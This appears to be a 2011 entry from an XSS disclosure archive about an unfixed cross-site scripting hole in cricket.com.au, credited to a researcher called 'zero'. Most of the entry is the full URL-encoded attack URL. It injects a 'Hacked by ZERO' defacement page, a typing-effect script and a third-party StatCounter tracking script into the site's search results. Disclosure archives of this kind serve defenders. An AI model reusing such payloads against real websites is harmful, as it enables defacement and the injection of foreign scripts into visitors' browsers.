Security researcher zero, has submitted on 23/03/2011 a cross-site-scripting (XSS) vulnerability affecting cricket.com.au, which at the time of submission ranked 41477 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 23/03/2011 |
Date published: 11/12/2011 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: zero |
Domain: cricket.com.au |
Category: XSS |
Pagerank: 41477 |
|---|
URL: http://cricket.com.au/searchresult/%3Chead%3E+%3Ctitle%3EHacked+by+ZERO%3C%2Ftitle%3E+%3C%2Fh1%3E%3C
BODY++++BGCOLOR%3D%22%23000000%22++++TEXT%3D%22%23FFFFFF%22+%3E+%3Cbody%3E+%3C%2Fhead%3E+%3Cbr%3E+%3
Cbr%3E+%3Cbr%3E+%3Ccenter%3E%3Cimg+src%3D%22http://img156.imageshack.us/img156/1594/zeroso.png%22++%
3E%3C%2Fcenter%3E+%3Cbr%3E+%3Ch3%3E+%3C%2Fcaption%3E+%3Ccenter%3E%3Ccaption%3E$+HACK%20+$+ME+$+IF%20
U%20CAN+$%3C%2Fa%3E%3C%2Fcenter%3E+%3C%2Fcaption%3E+%3Cbr%3E+%3Ccenter%3E+%3Cbody+onLoad%3D%22docume
nt.form.input.focus%28%29%3B%22%3E++%3Cbr%3E+%3Cfont+color%3D%22red%22%3E%3Cspan+id%3D%22typing%22%3
E+Your+site+is+vulnerable+to+xxs+%3Cbr%3E+Hacked+by+ZERO%3C%2Fspan%3E++%3Cscript+type%3D%22text%2Fja
vascript%22%3E++interval+%3D+30%3B+%2F%2F+Interval+in+milliseconds+to+wait+between+characters++if%28
document.getElementById%29+%7B+t+%3D+document.getElementById%28%22typing%22%29%3B+if%28t.innerHTML%2
9+%7B+typingBuffer+%3D+%22%22%3B+%2F%2F+buffer+prevents+some+browsers+stripping+spaces+it+%3D+0%3B+m
ytext+%3D+t.innerHTML%3B+t.innerHTML+%3D+%22%22%3B+typeit%28%29%3B+%7D+%7D++function+typeit%28%29+%7
B+mytext+%3D+mytext.replace%28%2F%3C%28%5B%5E%3C%5D%29*%3E%2F%2C+%22%22%29%3B+%2F%2F+Strip+HTML+from
+text+if%28it+%3C+mytext.length%29+%7B+typingBuffer+%2B%3D+mytext.charAt%28it%29%3B+t.innerHTML+%3D+
typingBuffer%3B+it%2B%2B%3B+setTimeout%28%22typeit%28%29%22%2C+interval%29%3B+%7D+%7D+%3C%2Fscript%3
E+%3Cbr%3E+%3C%2Ffont%3E+%3Cbr%3E+%3Cbr%3E+%3Ccenter%3E%3Ccaption%3Eyou.got.hacked.by.ZERO...!!!!%3C
%2Fa%3E%3C%2Fcenter%3E+%3C!--+Start+of+StatCounter+Code+--%3E+%3Cscript+type%3D%22text%2Fjavascript%
22%3E+var+sc_project%3D6474887%3B++var+sc_invisible%3D1%3B++var+sc_security%3D%229181d223%22%3B++%3C
%2Fscript%3E++%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22http%3A%2F%2Fwww.statcounter.com%2Fc
ounter%2Fcounter.js%22%3E%3C%2Fscript%3E%3Cnoscript%3E%3Cdiv+class%3D%22statcounter%22%3E%3Ca+title%
3D%22hit+counter%22+href%3D%22http%3A%2F%2Fstatcounter.com%2Ffree_hit_counter.html%22+target%3D%22_b
lank%22%3E%3Cimg+class%3D%22statcounter%22+src%3D%22http%3A%2F%2Fc.statcounter.com%2F6474887%2F0%2F9
181d223%2F1%2F%22+alt%3D%22hit+counter%22+%3E%3C%2Fa%3E%3C%2Fdiv%3E%3C%2Fnoscript%3E+%3C!--+End+of+S
tatCounter+Code+--%3E%3C%2Fbody%3E+%3C%2Fdiv%3E+%3C%2Fform%3E+%3C%2Fcenter%3E+%3C%2Fbody%3E&x=0&y=0 |
|
Click here to view the mirror
|
|
|
| 
